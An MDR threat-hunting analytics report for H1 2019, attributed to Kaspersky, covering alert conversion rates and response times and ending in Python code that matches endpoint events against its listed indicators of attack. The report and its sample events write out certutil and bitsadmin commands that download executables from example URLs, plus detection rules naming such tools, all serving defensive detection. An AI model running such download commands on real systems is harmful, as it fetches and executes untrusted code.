Managed Detection and Response analytics report, H1 2019

CONTENTS
Introduction
Life cycle of a threat hunting hypothesis
Geography and industry verticals of the MDR service delivered by Kaspersky
Incident detection operations
MTTR in view of incident severity
Things to note
Effectiveness of detection technologies
Incident distribution by event source (sensors)
Highlights
Statistics on incident severity level distributed by detection technology
Statistics on attack tactics used in incidents of different severity (high, medium, low) at the time of detection
Highlights
Effectiveness of MITRE ATT&CK in security operations
Kaspersky MDR service description
Detection technologies
Monitoring process

Introduction

This report contains the results of the Managed Detection and Response (MDR) service (brand name – Kaspersky Managed Protection). The MDR service provides managed threat hunting and initial incident response. Threat hunting is the practice of iteratively searching through data collected from sensors (referenced as telemetry or events) in order to detect threats that successfully evade automatic security solutions. A brief description of the service is provided at the end of this document.

The MDR service processes security operations events, focusing on and improving activity performed by professionals in charge of threat hunting projects, their level of expertise and the threat intelligence enabled through the detection process. According to David Bianco’s Pyramid of Pain, TTP-based threat detection is the most difficult type of indicators of attacks (IoAs) to circumvent for an adversary. The Kaspersky team is focused on TTP-based threat hunting in its MDR service, where humans are heavily involved to ensure the best judgments are made on collected events, especially advanced threats. This significantly augments automatic detection logic provided by endpoint protection products (EPP) used as sensors during the service delivery.

Geography and industry verticals of the MDR service delivered by Kaspersky

The analysis was conducted based on data from organizations around the world that used our service in the first half of 2019. Government bodies, financial institutions, industrial organizations, telecommunication and IT companies worldwide use our service to protect their IT infrastructure. Data from organizations that used our services for frequent health checks was also included.

Incident detection operations

Almost all alerts were generated by the analysis of events from endpoint sensors based on IoAs (TTP-based threat detection logic) and less than 2% of them were identified as cybersecurity incidents.

The low IoA conversion rate reflects the need to detect advanced threats which use a ‘living off the land’ approach, with behaviors that are very similar to legitimate activity. The more a malicious behavior mimics the normal behavior of users and administrators, the higher the rate of false positives and, consequently, the lower the conversion rate from alerts.

Mean time to response (MTTR), or incident processing time, is the time from an automatic alert generation as a result of automated analysis of events to its resolution by Kaspersky experts.

~25 mins average MTTR

It is worth noting that incident investigation may include additional work on the customer side or extra expert analysis and it may require more time for resolution – on average, up to 37 minutes in cases of incidents associated with advanced threats or sophisticated attack detection.

Examples of IoAs:

* Start command line (or bat/PowerShell) script within a browser, office application or server application (such as SQL server, SQL server agent, nginx, JBoss, Tomcat, etc.);

* Suspicious use of certutil for file download (example command: certutil -verifyctl -f -split https[:]//example.com/wce.exe);

* File upload with BITS (Background Intelligent Transfer Service);

* whoami command from SYSTEM account, and many others.
...
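The four IoAs listed above are behavioural rules over process-creation telemetry. The following is an added illustration of how such rules can be matched against endpoint events; it is example code, not Kaspersky's detection logic, and the parent-process sets, event fields and sample events are constructed assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    parent: str   # image name of the parent process
    image: str    # image name of the created process
    cmdline: str  # full command line
    user: str     # account the process runs under

# Assumed set of applications that have no business spawning a shell or script host.
APP_PARENTS = {"chrome.exe", "firefox.exe", "winword.exe", "excel.exe", "outlook.exe",
               "sqlservr.exe", "sqlagent.exe", "nginx.exe", "java.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

def match_ioas(ev):
    """Return the names of the IoAs from the report that this event triggers."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    hits = []
    # 1. Command line / PowerShell started inside a browser, office or server application.
    if image in SCRIPT_HOSTS and parent in APP_PARENTS:
        hits.append("script_from_app")
    # 2. certutil with a download-capable switch and a URL on its command line.
    if image == "certutil.exe" and re.search(r"-(verifyctl|urlcache)\b", cmd) \
            and re.search(r"https?://", cmd):
        hits.append("certutil_download")
    # 3. File transfer via BITS, either through bitsadmin or the PowerShell cmdlet.
    if (image == "bitsadmin.exe" and "/transfer" in cmd) or "start-bitstransfer" in cmd:
        hits.append("bits_transfer")
    # 4. whoami executed under the SYSTEM account.
    if image == "whoami.exe" and ev.user.upper() in {"SYSTEM", "NT AUTHORITY\\SYSTEM"}:
        hits.append("whoami_as_system")
    return hits

# Constructed sample telemetry (not real customer data); the last event is benign.
SAMPLE_EVENTS = [
    ProcessEvent("winword.exe", "powershell.exe", "powershell -w hidden -f C:\\Users\\Public\\stage.ps1", "corp\\alice"),
    ProcessEvent("cmd.exe", "certutil.exe",
                 "certutil -verifyctl -f -split https://example.com/placeholder.exe", "corp\\alice"),
    ProcessEvent("cmd.exe", "bitsadmin.exe",
                 "bitsadmin /transfer job https://example.com/placeholder.bin C:\\Users\\Public\\p.bin", "corp\\bob"),
    ProcessEvent("services.exe", "whoami.exe", "whoami /all", "NT AUTHORITY\\SYSTEM"),
    ProcessEvent("explorer.exe", "powershell.exe", "powershell Get-Date", "corp\\alice"),
]

def triage(events):
    """Map each alerting event index to its IoA hits; silent events are omitted."""
    return {i: h for i, h in ((i, match_ioas(e)) for i, e in enumerate(events)) if h}

if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, names)
```

Each hit here is only an alert; as the report's sub-2% conversion rate shows, an analyst still has to decide whether the behaviour is an incident or legitimate administration.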